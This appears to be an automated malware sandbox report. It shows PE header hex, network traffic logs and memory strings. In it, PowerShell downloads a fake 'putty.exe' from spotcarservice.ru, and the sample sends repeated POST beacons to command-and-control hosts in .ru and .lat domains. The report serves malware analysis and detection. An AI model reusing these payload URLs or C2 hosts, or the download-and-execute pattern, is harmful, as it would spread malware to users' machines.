00 00 00 00 00 00 00 00 f0 04 00 00 04 00 00 ba f9 04 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 28 ea 03 00 28 00 00 00 00 b0 04 00 e0 39 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 2e 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 8c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 1a e3 03 00 00 10 00 00 00 e4 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 e8 ac 00 00 00 00 04 00 00 60 00 00 00 e8 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 e0 39 00 00 00 b0 04 00 00 3a 00 00 00 48 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0
                Source: global trafficHTTP traffic detected: GET /fdjskf88cvt/yumba/putty.exe HTTP/1.1Host: spotcarservice.ruConnection: Keep-Alive
                Source: Joe Sandbox ViewIP Address: 109.70.26.37 109.70.26.37
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eatxyeykjsmocbq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: constractionscity1991.lat
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vqoifgeqmslm.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 163Host: restructurisationservice.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cpgkhdyexjobuel.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 164Host: connecticutproperty.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kssjunoucpo.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 225Host: constractionscity1991.lat
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dgibnmnukcth.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 305Host: restructurisationservice.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lygvohbryeni.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 361Host: connecticutproperty.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://hpkihdgfpdwnih.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: constractionscity1991.lat
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yitqmxmwjwycdun.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 274Host: restructurisationservice.ru
                Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yfnvfnqkorbos.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: connecticutproperty.ru
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /fdjskf88cvt/yumba/putty.exe HTTP/1.1Host: spotcarservice.ruConnection: Keep-Alive
                Source: global trafficDNS traffic detected: DNS query: spotcarservice.ru
                Source: global trafficDNS traffic detected: DNS query: constractionscity1991.lat
                Source: global trafficDNS traffic detected: DNS query: restructurisationservice.ru
                Source: global trafficDNS traffic detected: DNS query: connecticutproperty.ru
                Source: unknownHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://eatxyeykjsmocbq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 349Host: constractionscity1991.lat
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 06:52:50 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 06:52:52 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 06:54:21 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 06:54:22 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 06:54:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 63 6f 6e 73 74 72 61 63 74 69 6f 6e 73 63 69 74 79 31 39 39 31 2e 6c 61 74 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19d<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at constractionscity1991.lat Port 80</address></body></html>0
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 19 Dec 2024 06:54:27 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: keep-aliveData Raw: 31 39 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 36 32 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 72 65 73 74 72 75 63 74 75 72 69 73 61 74 69 6f 6e 73 65 72 76 69 63 65 2e 72 75 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 19f<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL / was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.62 (Debian) Server at restructurisationservice.ru Port 80</address></body></html>0
                Source: explorer.exe, 00000005.00000000.1622386973.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1622386973.000000000926A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                Source: explorer.exe, 00000005.00000000.1622386973.000000000926A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ccert.coml07
                Source: explorer.exe, 00000005.00000000.1622386973.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1622386973.000000000926A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                Source: explorer.exe, 00000005.00000000.1622386973.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1622386973.0000000009237000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1622386973.000000000926A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                Source: explorer.exe, 00000005.00000000.1620332026.0000000004405000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ns.adobeS
                Source: powershell.exe, 00000002.00000002.1578053595.0000022BEE91C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1578053595.0000022BEEACA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1561572514.0000022BE04F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: explorer.exe, 00000005.00000000.1622386973.00000000091FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.1622386973.000000000926A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                Source: explorer.exe, 00000005.00000000.1622386973.00000000090DA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDEAD3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: explorer.exe, 00000005.00000000.1621501384.0000000007720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1619859258.0000000002C80000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.1621487321.0000000007710000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDE8B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.r
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDEAD3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1561572514.0000022BE04C7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1561572514.0000022BE03FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/f
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fd
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdj
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjs
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjsk
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf8
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88c
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cv
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/y
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/yu
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/yum
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/yumb
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/yumba
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/yumba/
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/yumba/p
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/yumba/pu
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/yumba/put
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/yumba/putt
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/yumba/putty
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/yumba/putty.
                Source: powershell.exe, 00000002.00000002.1561572514.0000022BDF752000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://spotcarservice.ru/fdjskf88cvt/yumba/putty.e
